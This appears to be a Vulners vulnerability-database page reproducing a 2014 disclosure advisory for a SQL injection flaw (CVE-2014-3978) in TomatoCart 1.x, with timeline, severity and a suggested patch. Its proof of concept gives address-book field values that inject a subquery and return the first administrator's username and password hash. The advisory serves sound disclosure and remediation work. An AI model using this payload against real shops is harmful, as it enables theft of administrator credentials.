Vulners
Lucene search
TomatoCart 1.x - SQL Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | TomatoCart 1.x - SQL Injection Vulnerability | 14 Aug 201400:00 | – | zdt |
 | CVE-2014-3978 | 20 Oct 201416:00 | – | cve |
 | CVE-2014-3978 | 20 Oct 201416:00 | – | cvelist |
 | TomatoCart 1.1.8 SQL Injection | 20 Sep 201400:00 | – | dsquare |
 | EUVD-2014-3911 | 7 Oct 202500:30 | – | euvd |
 | TomatoCart 1.x - SQL Injection | 9 Aug 201400:00 | – | exploitpack |
 | CVE-2014-3978 | 20 Oct 201416:55 | – | nvd |
 | TomatoCart SQL Injection and Cross Site Scripting Vulnerabilities | 28 Oct 201400:00 | – | openvas |
 | TomatoCart 1.x Cross Site Scripting / SQL Injection | 6 Aug 201400:00 | – | packetstorm |
 | Sql injection | 20 Oct 201416:55 | – | prion |
10
Title:
TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability
Background:
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. The current stable package is TomatoCart V1.1.8.6.1, while the latest development version is version 2.0 Alpha 4. This exploit affects the "stable" tree.
Timeline:
06 June 2014 - CVE-2014-3978 assigned
06 June 2014 - Submitted to vendor
25 June 2014 - Received inadequate patch from vendor
26 June 2014 - Suggested patch sent to vendor
17 July 2014 - Request for update from vendor, no response.
05 August 2014 - Pull request sent on github for full patch
Status:
Vendor ignored, see suggested fix below.
Released:
05 August 2014 - https://breaking.technology/advisories/CVE-2014-3978.txt
Classification:
SQL Injection
Exploit Complexity:
Low
Severity:
High
Description:
TomatoCart suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
Required Information:
* Valid user account
PoC:
Create a new contact in your address book using the following values.
First name: :entry_lastname,
Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
The new contact will be added to your address book with the admin hash as the contact's street address
Suggested Action:
Pull request has been sent to the developers on github. Recommend patching the required to properly encode colon (:)
https://github.com/tomatocart/TomatoCart-v1/pull/238Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Aug 2014 00:00Current
7High risk
Vulners AI Score7
CVSS 26.5
EPSS0.00603